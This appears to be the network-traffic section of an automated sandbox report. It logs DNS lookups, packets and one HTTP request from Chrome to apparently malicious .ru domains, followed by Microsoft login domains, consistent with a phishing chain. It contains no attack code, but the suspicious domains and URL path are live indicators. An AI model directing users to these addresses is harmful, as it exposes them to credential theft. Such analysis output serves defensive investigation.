                                                                            Dec 19, 2024 15:37:45.789036989 CET44349759172.67.134.110192.168.2.17
                                                                            Dec 19, 2024 15:37:45.789462090 CET49759443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:45.789493084 CET44349759172.67.134.110192.168.2.17
                                                                            Dec 19, 2024 15:37:45.793311119 CET44349759172.67.134.110192.168.2.17
                                                                            Dec 19, 2024 15:37:45.793448925 CET49759443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:45.793754101 CET49759443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:45.793917894 CET49759443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:45.793921947 CET44349759172.67.134.110192.168.2.17
                                                                            Dec 19, 2024 15:37:45.838861942 CET49759443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:45.838879108 CET44349759172.67.134.110192.168.2.17
                                                                            Dec 19, 2024 15:37:45.886837959 CET49759443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:46.922476053 CET44349759172.67.134.110192.168.2.17
                                                                            Dec 19, 2024 15:37:46.922570944 CET44349759172.67.134.110192.168.2.17
                                                                            Dec 19, 2024 15:37:46.922635078 CET49759443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:46.923799992 CET49759443192.168.2.17172.67.134.110
                                                                            Dec 19, 2024 15:37:46.923809052 CET44349759172.67.134.110192.168.2.17
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 19, 2024 15:36:10.968208075 CET5288653192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:36:10.968465090 CET5955253192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:36:11.101861954 CET53651551.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:36:11.127027988 CET53585061.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:36:11.530178070 CET53595521.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:36:11.530365944 CET53528861.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:36:13.970191002 CET53491801.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:36:15.042045116 CET5591453192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:36:15.042236090 CET6317453192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:36:15.042516947 CET6542153192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:36:15.042649031 CET6018353192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:36:15.042926073 CET6457453192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:36:15.043049097 CET4955853192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:36:15.180932999 CET53631741.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:36:15.181157112 CET53654211.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:36:15.181303024 CET53495581.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:36:15.181503057 CET53645741.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:36:15.181536913 CET53601831.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:36:15.181554079 CET53559141.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:36:15.501935959 CET4918353192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:36:15.502116919 CET5850553192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:36:15.641666889 CET53585051.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:36:15.641714096 CET53491831.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:36:17.139612913 CET5017353192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:36:17.139750957 CET5102153192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:36:17.276988983 CET53501731.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:36:17.279242992 CET53510211.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:36:17.280121088 CET5145853192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:36:17.280291080 CET6248653192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:36:17.418862104 CET53514581.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:36:17.420190096 CET53624861.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:36:18.831979990 CET6053353192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:36:18.832134962 CET5663953192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:36:18.848146915 CET4916153192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:36:18.848436117 CET6314753192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:36:18.969027042 CET53566391.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:36:18.971769094 CET53605331.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:36:18.988060951 CET53491611.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:36:18.991142988 CET53631471.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:36:23.307328939 CET5123553192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:36:23.307516098 CET5543453192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:36:23.445168972 CET53554341.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:36:23.445936918 CET53512351.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:36:31.118887901 CET53625511.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:36:49.728491068 CET53613461.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:37:11.111876965 CET53557451.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:37:12.393132925 CET53550601.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:37:16.791079998 CET138138192.168.2.17192.168.2.255
                                                                            Dec 19, 2024 15:37:37.028597116 CET4970153192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:37:37.028793097 CET6398253192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:37:37.166539907 CET53497011.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:37:37.171396017 CET53639821.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:37:38.999768019 CET6177453192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:37:38.999933958 CET6483853192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:37:39.013078928 CET5501453192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:37:39.013266087 CET6282453192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:37:39.136977911 CET53617741.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:37:39.138329983 CET53648381.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:37:39.414685965 CET53550141.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:37:39.414732933 CET53628241.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:37:43.207887888 CET5111253192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:37:43.208189011 CET5434153192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:37:43.208825111 CET5314053192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:37:43.209141016 CET5183753192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:37:43.250835896 CET53533081.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:37:43.348416090 CET53518371.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:37:43.349373102 CET53531401.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:37:43.770668983 CET53543411.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:37:45.738698959 CET5098053192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:37:45.738872051 CET6333953192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:37:45.969804049 CET53633391.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:37:48.077581882 CET5318753192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:37:48.077743053 CET5493753192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:37:53.788841963 CET6049253192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:37:53.789026022 CET5047053192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:37:53.932523012 CET53504701.1.1.1192.168.2.17
                                                                            Dec 19, 2024 15:37:56.191154003 CET5314553192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:37:56.191327095 CET5271353192.168.2.171.1.1.1
                                                                            Dec 19, 2024 15:38:07.939781904 CET53509531.1.1.1192.168.2.17
                                                                            TimestampSource IPDest IPChecksumCodeType
                                                                            Dec 19, 2024 15:36:11.223012924 CET192.168.2.171.1.1.1c240(Port unreachable)Destination Unreachable
                                                                            Dec 19, 2024 15:37:51.530240059 CET192.168.2.171.1.1.1c2e9(Port unreachable)Destination Unreachable
                                                                            Dec 19, 2024 15:37:56.660195112 CET192.168.2.171.1.1.1c2c1(Port unreachable)Destination Unreachable
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Dec 19, 2024 15:36:10.968208075 CET192.168.2.171.1.1.10xb6b1Standard query (0)gs.quantumdhub.ruA (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:10.968465090 CET192.168.2.171.1.1.10x53bfStandard query (0)gs.quantumdhub.ru65IN (0x0001)false
                                                                            Dec 19, 2024 15:36:15.042045116 CET192.168.2.171.1.1.10x4cbStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:15.042236090 CET192.168.2.171.1.1.10x9a34Standard query (0)code.jquery.com65IN (0x0001)false
                                                                            Dec 19, 2024 15:36:15.042516947 CET192.168.2.171.1.1.10x2bd6Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:15.042649031 CET192.168.2.171.1.1.10x70c5Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                            Dec 19, 2024 15:36:15.042926073 CET192.168.2.171.1.1.10x5eeaStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:15.043049097 CET192.168.2.171.1.1.10xda9fStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                            Dec 19, 2024 15:36:15.501935959 CET192.168.2.171.1.1.10xd6e2Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:15.502116919 CET192.168.2.171.1.1.10x3761Standard query (0)www.google.com65IN (0x0001)false
                                                                            Dec 19, 2024 15:36:17.139612913 CET192.168.2.171.1.1.10xbc7eStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:17.139750957 CET192.168.2.171.1.1.10x18dcStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                            Dec 19, 2024 15:36:17.280121088 CET192.168.2.171.1.1.10x8d28Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:17.280291080 CET192.168.2.171.1.1.10x7396Standard query (0)code.jquery.com65IN (0x0001)false
                                                                            Dec 19, 2024 15:36:18.831979990 CET192.168.2.171.1.1.10x3Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:18.832134962 CET192.168.2.171.1.1.10xdb70Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                            Dec 19, 2024 15:36:18.848146915 CET192.168.2.171.1.1.10xc458Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:18.848436117 CET192.168.2.171.1.1.10xc95Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                            Dec 19, 2024 15:36:23.307328939 CET192.168.2.171.1.1.10x6b16Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:23.307516098 CET192.168.2.171.1.1.10xe241Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                            Dec 19, 2024 15:37:37.028597116 CET192.168.2.171.1.1.10x7addStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:37.028793097 CET192.168.2.171.1.1.10xccaStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                            Dec 19, 2024 15:37:38.999768019 CET192.168.2.171.1.1.10x84b0Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:38.999933958 CET192.168.2.171.1.1.10xb85bStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                            Dec 19, 2024 15:37:39.013078928 CET192.168.2.171.1.1.10x9a9Standard query (0)vacqpb6rdspyrqetrgwvvkqmw7ow7vkt5sbnoesg8yycubxdba.aeeouirl.ruA (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:39.013266087 CET192.168.2.171.1.1.10xf59cStandard query (0)vacqpb6rdspyrqetrgwvvkqmw7ow7vkt5sbnoesg8yycubxdba.aeeouirl.ru65IN (0x0001)false
                                                                            Dec 19, 2024 15:37:43.207887888 CET192.168.2.171.1.1.10x1839Standard query (0)word.office.comA (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:43.208189011 CET192.168.2.171.1.1.10x8a7bStandard query (0)word.office.com65IN (0x0001)false
                                                                            Dec 19, 2024 15:37:43.208825111 CET192.168.2.171.1.1.10x58f2Standard query (0)vacqpb6rdspyrqetrgwvvkqmw7ow7vkt5sbnoesg8yycubxdba.aeeouirl.ruA (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:43.209141016 CET192.168.2.171.1.1.10xb54dStandard query (0)vacqpb6rdspyrqetrgwvvkqmw7ow7vkt5sbnoesg8yycubxdba.aeeouirl.ru65IN (0x0001)false
                                                                            Dec 19, 2024 15:37:45.738698959 CET192.168.2.171.1.1.10x24ecStandard query (0)www.microsoft365.comA (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:45.738872051 CET192.168.2.171.1.1.10xa228Standard query (0)www.microsoft365.com65IN (0x0001)false
                                                                            Dec 19, 2024 15:37:48.077581882 CET192.168.2.171.1.1.10x8f72Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:48.077743053 CET192.168.2.171.1.1.10x12cbStandard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                            Dec 19, 2024 15:37:53.788841963 CET192.168.2.171.1.1.10x8fdStandard query (0)www.microsoft365.comA (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:53.789026022 CET192.168.2.171.1.1.10x2270Standard query (0)www.microsoft365.com65IN (0x0001)false
                                                                            Dec 19, 2024 15:37:56.191154003 CET192.168.2.171.1.1.10xd248Standard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:56.191327095 CET192.168.2.171.1.1.10x9fa7Standard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Dec 19, 2024 15:36:10.238461971 CET1.1.1.1192.168.2.170xda21No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:10.238461971 CET1.1.1.1192.168.2.170xda21No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:11.530178070 CET1.1.1.1192.168.2.170x53bfNo error (0)gs.quantumdhub.ru65IN (0x0001)false
                                                                            Dec 19, 2024 15:36:11.530365944 CET1.1.1.1192.168.2.170xb6b1No error (0)gs.quantumdhub.ru104.21.112.1A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:11.530365944 CET1.1.1.1192.168.2.170xb6b1No error (0)gs.quantumdhub.ru104.21.64.1A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:11.530365944 CET1.1.1.1192.168.2.170xb6b1No error (0)gs.quantumdhub.ru104.21.80.1A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:11.530365944 CET1.1.1.1192.168.2.170xb6b1No error (0)gs.quantumdhub.ru104.21.16.1A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:11.530365944 CET1.1.1.1192.168.2.170xb6b1No error (0)gs.quantumdhub.ru104.21.32.1A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:11.530365944 CET1.1.1.1192.168.2.170xb6b1No error (0)gs.quantumdhub.ru104.21.48.1A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:11.530365944 CET1.1.1.1192.168.2.170xb6b1No error (0)gs.quantumdhub.ru104.21.96.1A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:15.181157112 CET1.1.1.1192.168.2.170x2bd6No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:15.181157112 CET1.1.1.1192.168.2.170x2bd6No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:15.181303024 CET1.1.1.1192.168.2.170xda9fNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                            Dec 19, 2024 15:36:15.181503057 CET1.1.1.1192.168.2.170x5eeaNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:15.181503057 CET1.1.1.1192.168.2.170x5eeaNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:15.181536913 CET1.1.1.1192.168.2.170x70c5No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                            Dec 19, 2024 15:36:15.181554079 CET1.1.1.1192.168.2.170x4cbNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:15.181554079 CET1.1.1.1192.168.2.170x4cbNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:15.181554079 CET1.1.1.1192.168.2.170x4cbNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:15.181554079 CET1.1.1.1192.168.2.170x4cbNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:15.641666889 CET1.1.1.1192.168.2.170x3761No error (0)www.google.com65IN (0x0001)false
                                                                            Dec 19, 2024 15:36:15.641714096 CET1.1.1.1192.168.2.170xd6e2No error (0)www.google.com172.217.19.164A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:17.276988983 CET1.1.1.1192.168.2.170xbc7eNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:17.276988983 CET1.1.1.1192.168.2.170xbc7eNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:17.279242992 CET1.1.1.1192.168.2.170x18dcNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                            Dec 19, 2024 15:36:17.418862104 CET1.1.1.1192.168.2.170x8d28No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:17.418862104 CET1.1.1.1192.168.2.170x8d28No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:17.418862104 CET1.1.1.1192.168.2.170x8d28No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:17.418862104 CET1.1.1.1192.168.2.170x8d28No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:18.969027042 CET1.1.1.1192.168.2.170xdb70No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                            Dec 19, 2024 15:36:18.971769094 CET1.1.1.1192.168.2.170x3No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:18.971769094 CET1.1.1.1192.168.2.170x3No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:18.988060951 CET1.1.1.1192.168.2.170xc458No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:18.988060951 CET1.1.1.1192.168.2.170xc458No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:18.991142988 CET1.1.1.1192.168.2.170xc95No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                            Dec 19, 2024 15:36:21.559968948 CET1.1.1.1192.168.2.170x9d75No error (0)templatesmetadata.office.nettemplatesmetadata.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:23.445936918 CET1.1.1.1192.168.2.170x6b16No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:36:46.193703890 CET1.1.1.1192.168.2.170xb5d0No error (0)templatesmetadata.office.nettemplatesmetadata.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:17.172790051 CET1.1.1.1192.168.2.170x3a5cNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:17.172790051 CET1.1.1.1192.168.2.170x3a5cNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:37.166539907 CET1.1.1.1192.168.2.170x7addNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:37.166539907 CET1.1.1.1192.168.2.170x7addNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:37.171396017 CET1.1.1.1192.168.2.170xccaNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                            Dec 19, 2024 15:37:39.136977911 CET1.1.1.1192.168.2.170x84b0No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:39.136977911 CET1.1.1.1192.168.2.170x84b0No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:39.138329983 CET1.1.1.1192.168.2.170xb85bNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                            Dec 19, 2024 15:37:39.414685965 CET1.1.1.1192.168.2.170x9a9No error (0)vacqpb6rdspyrqetrgwvvkqmw7ow7vkt5sbnoesg8yycubxdba.aeeouirl.ru172.67.134.110A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:39.414685965 CET1.1.1.1192.168.2.170x9a9No error (0)vacqpb6rdspyrqetrgwvvkqmw7ow7vkt5sbnoesg8yycubxdba.aeeouirl.ru104.21.25.176A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:39.414732933 CET1.1.1.1192.168.2.170xf59cNo error (0)vacqpb6rdspyrqetrgwvvkqmw7ow7vkt5sbnoesg8yycubxdba.aeeouirl.ru65IN (0x0001)false
                                                                            Dec 19, 2024 15:37:43.348416090 CET1.1.1.1192.168.2.170xb54dNo error (0)vacqpb6rdspyrqetrgwvvkqmw7ow7vkt5sbnoesg8yycubxdba.aeeouirl.ru65IN (0x0001)false
                                                                            Dec 19, 2024 15:37:43.349373102 CET1.1.1.1192.168.2.170x58f2No error (0)vacqpb6rdspyrqetrgwvvkqmw7ow7vkt5sbnoesg8yycubxdba.aeeouirl.ru172.67.134.110A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:43.349373102 CET1.1.1.1192.168.2.170x58f2No error (0)vacqpb6rdspyrqetrgwvvkqmw7ow7vkt5sbnoesg8yycubxdba.aeeouirl.ru104.21.25.176A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:43.743099928 CET1.1.1.1192.168.2.170x1839No error (0)word.office.comhome-redirects.www.office.comCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:43.743099928 CET1.1.1.1192.168.2.170x1839No error (0)home-redirects.www.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:43.770668983 CET1.1.1.1192.168.2.170x8a7bNo error (0)word.office.comhome-redirects.www.office.comCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:43.770668983 CET1.1.1.1192.168.2.170x8a7bNo error (0)home-redirects.www.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:45.969804049 CET1.1.1.1192.168.2.170xa228No error (0)www.microsoft365.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:45.969804049 CET1.1.1.1192.168.2.170xa228No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:46.085484028 CET1.1.1.1192.168.2.170x24ecNo error (0)www.microsoft365.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:46.085484028 CET1.1.1.1192.168.2.170x24ecNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:48.217673063 CET1.1.1.1192.168.2.170x12cbNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:48.218410015 CET1.1.1.1192.168.2.170x8f72No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:51.242019892 CET1.1.1.1192.168.2.170x6b98No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:51.242019892 CET1.1.1.1192.168.2.170x6b98No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:53.891822100 CET1.1.1.1192.168.2.170x7f15No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:53.891822100 CET1.1.1.1192.168.2.170x7f15No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:53.929521084 CET1.1.1.1192.168.2.170x8fdNo error (0)www.microsoft365.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:53.929521084 CET1.1.1.1192.168.2.170x8fdNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:53.932523012 CET1.1.1.1192.168.2.170x2270No error (0)www.microsoft365.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:53.932523012 CET1.1.1.1192.168.2.170x2270No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:56.330559015 CET1.1.1.1192.168.2.170xd248No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 19, 2024 15:37:56.331305981 CET1.1.1.1192.168.2.170x9fa7No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                            • gs.quantumdhub.ru
                                                                            • https:
                                                                              • code.jquery.com
                                                                              • cdnjs.cloudflare.com
                                                                              • challenges.cloudflare.com
                                                                              • vacqpb6rdspyrqetrgwvvkqmw7ow7vkt5sbnoesg8yycubxdba.aeeouirl.ru
                                                                            • a.nel.cloudflare.com
                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.1749709104.21.112.14436604C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-19 14:36:14 UTC694OUTGET /HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/ HTTP/1.1
                                                                            Host: gs.quantumdhub.ru
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Upgrade-Insecure-Requests: 1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Sec-Fetch-Site: none
                                                                            Sec-Fetch-Mode: navigate
                                                                            Sec-Fetch-User: ?1
                                                                            Sec-Fetch-Dest: document
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-12-19 14:36:14 UTC1242INHTTP/1.1 200 OK
                                                                            Date: Thu, 19 Dec 2024 14:36:14 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Cache-Control: no-cache, private
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
